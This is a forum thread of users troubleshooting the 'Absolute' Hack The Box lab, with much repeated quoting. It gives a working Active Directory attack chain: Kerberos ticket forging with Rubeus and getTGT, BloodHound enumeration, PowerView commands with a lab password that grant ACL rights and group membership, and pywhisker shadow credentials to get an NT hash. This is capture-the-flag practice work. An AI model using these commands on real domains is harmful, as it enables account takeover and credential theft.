Fake?

(September 27, 2022, 09:03 AM)user_htb22 Wrote:

(September 27, 2022, 08:48 AM)ThatUsername Wrote:

(September 27, 2022, 07:16 AM)user_htb22 Wrote:

(September 27, 2022, 06:43 AM)Exa Wrote:

(September 25, 2022, 07:25 PM)user_htb22 Wrote: $ export KRB5CCNAME=svc_smb.ccache
$ impacket-smbclient [email protected] -k -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)

I got the same error, both with smbclient.py and crackmapexec. I made sure my clock is synchronized with the DC. Without synchronization I would get this error: KRB_AP_ERR_SKEW(Clock skew too great).

These are the commands I used:

sudo ntpdate absolute.htb
getTGT.py -dc-ip dc.absolute.htb absolute.htb/svc_smb:#########
export KRB5CCNAME=svc_smb.ccache
smbclient.py -dc-ip dc.absolute.htb -k absolute.htb

Does anyone has an idea why this is happening?

timedatectl set-ntp false
sudo ntpdate absolute.htb
watch u r time

smbclient won't work u need kerbores auth

export KRB5CCNAME=svc_smb.ccache
use cme smb or impacket smbclient

---

(September 26, 2022, 09:19 PM)ThatUsername Wrote:

(September 25, 2022, 06:03 PM)jahman Wrote: Hello,

Via bloodhound :  m.lovegod -- OWNS --> Group Network Audit -- Generic Write --> winrm_user

How did you collected the data? With every version of Bloodhound ingestor i ran into a "Failure to authenticate with LDAP". Using  and his password.

Bloodhound.py | Sharphound.ps1 | Sharphound.exe

is failing.

i use this

git clone https://github.com/jazzpizazz/BloodHound.py-Kerberos.git
cd BloodHound.py-Kerberos/
export KRB5CCNAME=m.lovegod.ccache
./bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb -ns 10.129.214.131 --dns-tcp --zip -no-pass -c All

yeah, tested this version too. Worked flawlessly.

did u get winrm_user password ?

No. Was able to get the bloodhound data and map the attack path but powerview won't connect to DC with my windows Maschine.

Calculated aes256 hash of lovegod with rubeus an spawned powershell process with the ticket but no success to use it for ownership attacks. Even with valid session / ticket

(September 27, 2022, 10:52 AM)ThatUsername Wrote:

(September 27, 2022, 09:03 AM)user_htb22 Wrote:

(September 27, 2022, 08:48 AM)ThatUsername Wrote:

(September 27, 2022, 07:16 AM)user_htb22 Wrote:

(September 27, 2022, 06:43 AM)Exa Wrote: I got the same error, both with smbclient.py and crackmapexec. I made sure my clock is synchronized with the DC. Without synchronization I would get this error: KRB_AP_ERR_SKEW(Clock skew too great).

These are the commands I used:

sudo ntpdate absolute.htb
getTGT.py -dc-ip dc.absolute.htb absolute.htb/svc_smb:#########
export KRB5CCNAME=svc_smb.ccache
smbclient.py -dc-ip dc.absolute.htb -k absolute.htb

Does anyone has an idea why this is happening?

timedatectl set-ntp false
sudo ntpdate absolute.htb
watch u r time

smbclient won't work u need kerbores auth

export KRB5CCNAME=svc_smb.ccache
use cme smb or impacket smbclient

---

(September 26, 2022, 09:19 PM)ThatUsername Wrote: How did you collected the data? With every version of Bloodhound ingestor i ran into a "Failure to authenticate with LDAP". Using  and his password.

Bloodhound.py | Sharphound.ps1 | Sharphound.exe

is failing.

i use this

git clone https://github.com/jazzpizazz/BloodHound.py-Kerberos.git
cd BloodHound.py-Kerberos/
export KRB5CCNAME=m.lovegod.ccache
./bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb -ns 10.129.214.131 --dns-tcp --zip -no-pass -c All

yeah, tested this version too. Worked flawlessly.

did u get winrm_user password ?

No. Was able to get the bloodhound data and map the attack path but powerview won't connect to DC with my windows Maschine.

Calculated aes256 hash of lovegod with rubeus an spawned powershell process with the ticket but no success to use it for ownership attacks. Even with valid session / ticket

Me too

(September 27, 2022, 10:52 AM)ThatUsername Wrote:

(September 27, 2022, 09:03 AM)user_htb22 Wrote:

(September 27, 2022, 08:48 AM)ThatUsername Wrote:

(September 27, 2022, 07:16 AM)user_htb22 Wrote:

(September 27, 2022, 06:43 AM)Exa Wrote: I got the same error, both with smbclient.py and crackmapexec. I made sure my clock is synchronized with the DC. Without synchronization I would get this error: KRB_AP_ERR_SKEW(Clock skew too great).

These are the commands I used:

sudo ntpdate absolute.htb
getTGT.py -dc-ip dc.absolute.htb absolute.htb/svc_smb:#########
export KRB5CCNAME=svc_smb.ccache
smbclient.py -dc-ip dc.absolute.htb -k absolute.htb

Does anyone has an idea why this is happening?

timedatectl set-ntp false
sudo ntpdate absolute.htb
watch u r time

smbclient won't work u need kerbores auth

export KRB5CCNAME=svc_smb.ccache
use cme smb or impacket smbclient

---

(September 26, 2022, 09:19 PM)ThatUsername Wrote: How did you collected the data? With every version of Bloodhound ingestor i ran into a "Failure to authenticate with LDAP". Using  and his password.

Bloodhound.py | Sharphound.ps1 | Sharphound.exe

is failing.

i use this

git clone https://github.com/jazzpizazz/BloodHound.py-Kerberos.git
cd BloodHound.py-Kerberos/
export KRB5CCNAME=m.lovegod.ccache
./bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb -ns 10.129.214.131 --dns-tcp --zip -no-pass -c All

yeah, tested this version too. Worked flawlessly.

did u get winrm_user password ?

No. Was able to get the bloodhound data and map the attack path but powerview won't connect to DC with my windows Maschine.

Calculated aes256 hash of lovegod with rubeus an spawned powershell process with the ticket but no success to use it for ownership attacks. Even with valid session / ticket

why dont u guys do in the windows vm , setup host file (C:\Windows\System32\drivers\etc\hosts) and then create tgt ticket with rubues (.\Rubeus.exe asktgt /enctype:AES256 /user:<username> /password:<password> /domain:absolute.htb /dc:dc.absolute.htb /ptt) and then  .\SharpHound.ps1; Invoke-BloodHound -Domain absolute.htb

(September 27, 2022, 06:43 AM)Exa Wrote:

(September 25, 2022, 07:25 PM)user_htb22 Wrote: $ export KRB5CCNAME=svc_smb.ccache
$ impacket-smbclient [email protected] -k -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)

I got the same error, both with smbclient.py and crackmapexec. I made sure my clock is synchronized with the DC. Without synchronization I would get this error: KRB_AP_ERR_SKEW(Clock skew too great).

These are the commands I used:

sudo ntpdate absolute.htb
getTGT.py -dc-ip dc.absolute.htb absolute.htb/svc_smb:#########
export KRB5CCNAME=svc_smb.ccache
smbclient.py -dc-ip dc.absolute.htb -k absolute.htb

Does anyone has an idea why this is happening?

Finally got this working. Apparently, dc.absolute.htb must be set as target (instead of absolute.htb or the IP address):

smbclient.py -k dc.absolute.htb

(September 27, 2022, 09:54 PM)Hacker2222 Wrote: with bloodhound result u can see path to winrmuser u need to add lovegod user to the group .then use genericwrite to edit shadow creds of winrmuser. just dont know how to add lovegod to group.  ............ tried windows powerview but isnt working..................

---

if someone finds how to add user to group . then u can prob use pywhisker to edit shadow cred

I was successfully able to add m.lovegod to the "network audit" group. But when i changed serviceprincipal name for the winrm_user I still get access denied.

Also, could not modify object via pywhisker

(September 28, 2022, 12:13 AM)Hacker2222 Wrote:

(September 27, 2022, 11:47 PM)samhub123 Wrote:

(September 27, 2022, 09:54 PM)Hacker2222 Wrote: with bloodhound result u can see path to winrmuser u need to add lovegod user to the group .then use genericwrite to edit shadow creds of winrmuser. just dont know how to add lovegod to group.  ............ tried windows powerview but isnt working..................

---

if someone finds how to add user to group . then u can prob use pywhisker to edit shadow cred

I was successfully able to add m.lovegod to the "network audit" group. But when i changed serviceprincipal name for the winrm_user I still get access denied.

Also, could not modify object via pywhisker

u run gettgt again ? maybe u need to refresh tgt .......... how do u add to network audit group ??? what command ?

---

(September 27, 2022, 11:47 PM)samhub123 Wrote:

(September 27, 2022, 09:54 PM)Hacker2222 Wrote: with bloodhound result u can see path to winrmuser u need to add lovegod user to the group .then use genericwrite to edit shadow creds of winrmuser. just dont know how to add lovegod to group.  ............ tried windows powerview but isnt working..................

---

if someone finds how to add user to group . then u can prob use pywhisker to edit shadow cred

I was successfully able to add m.lovegod to the "network audit" group. But when i changed serviceprincipal name for the winrm_user I still get access denied.

Also, could not modify object via pywhisker

and check if user is actuall y in the group JAJAJAJA

Yes they are,

GroupDomain            : absolute.htb
GroupName              : Network Audit
GroupDistinguishedName  : CN=Network Audit,CN=Users,DC=absolute,DC=htb
MemberDomain            : absolute.htb
MemberName              : svc_audit
MemberDistinguishedName : CN=svc_audit,CN=Users,DC=absolute,DC=htb
MemberObjectClass      : user
MemberSID              : S-1-5-21-4078382237-1492182817-2568127209-1115

GroupDomain            : absolute.htb
GroupName              : Network Audit
GroupDistinguishedName  : CN=Network Audit,CN=Users,DC=absolute,DC=htb
MemberDomain            : absolute.htb
MemberName              : m.lovegod
MemberDistinguishedName : CN=m.lovegod,CN=Users,DC=absolute,DC=htb
MemberObjectClass      : user
MemberSID              : S-1-5-21-4078382237-1492182817-2568127209-1109

Ill try refreshing TGT and report back

Okay, I was able to get ccahe file for winrm_user using pywhisker.
From that I also got the NThash for winrm_user

but using CME with hash and also with the ticket, it seems like I cannot access winrm using winrm_user

(September 27, 2022, 07:16 AM)user_htb22 Wrote:

(September 27, 2022, 06:43 AM)Exa Wrote:

(September 25, 2022, 07:25 PM)user_htb22 Wrote: $ export KRB5CCNAME=svc_smb.ccache
$ impacket-smbclient [email protected] -k -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)

I got the same error, both with smbclient.py and crackmapexec. I made sure my clock is synchronized with the DC. Without synchronization I would get this error: KRB_AP_ERR_SKEW(Clock skew too great).

These are the commands I used:

sudo ntpdate absolute.htb
getTGT.py -dc-ip dc.absolute.htb absolute.htb/svc_smb:#########
export KRB5CCNAME=svc_smb.ccache
smbclient.py -dc-ip dc.absolute.htb -k absolute.htb

Does anyone has an idea why this is happening?

timedatectl set-ntp false
sudo ntpdate absolute.htb
watch u r time

smbclient won't work u need kerbores auth

export KRB5CCNAME=svc_smb.ccache
use cme smb or impacket smbclient

---

(September 26, 2022, 09:19 PM)ThatUsername Wrote:

(September 25, 2022, 06:03 PM)jahman Wrote: Hello,

Via bloodhound :  m.lovegod -- OWNS --> Group Network Audit -- Generic Write --> winrm_user

How did you collected the data? With every version of Bloodhound ingestor i ran into a "Failure to authenticate with LDAP". Using  and his password.

Bloodhound.py | Sharphound.ps1 | Sharphound.exe

is failing.

i use this

git clone https://github.com/jazzpizazz/BloodHound.py-Kerberos.git
cd BloodHound.py-Kerberos/
export KRB5CCNAME=m.lovegod.ccache
./bloodhound.py -u m.lovegod -k -d absolute.htb -dc dc.absolute.htb -ns 10.129.214.131 --dns-tcp --zip -no-pass -c All

THX, it works

(September 28, 2022, 02:38 AM)Hacker2222 Wrote:

(September 28, 2022, 02:16 AM)samhub123 Wrote: Okay, I was able to get ccahe file for winrm_user using pywhisker.
From that I also got the NThash for winrm_user

but using CME with hash and also with the ticket, it seems like I cannot access winrm using winrm_user

if u have ccache file then just use evilwinrm?? how ddid u add lovegod to the group tho?

$dc_domain="absolute.htb"

$SecPassword = ConvertTo-SecureString "AbsoluteLDAP2022!" -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('absolute.htb\m.lovegod', $SecPassword)

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Network Audit" -Rights all -DomainController dc.absolute.htb  -principalidentity "m.lovegod"
Add-ADPrincipalGroupMembership -Identity  m.lovegod -MemberOf  'Network Audit' -Credential $Cred -Server dc.absolute.htb
Get-DomainGroupMember -Identity 'network audit' -Domain $dc_domain -DomainController dc.absolute.htb -Credential $cred

Let me know if you get winrm working.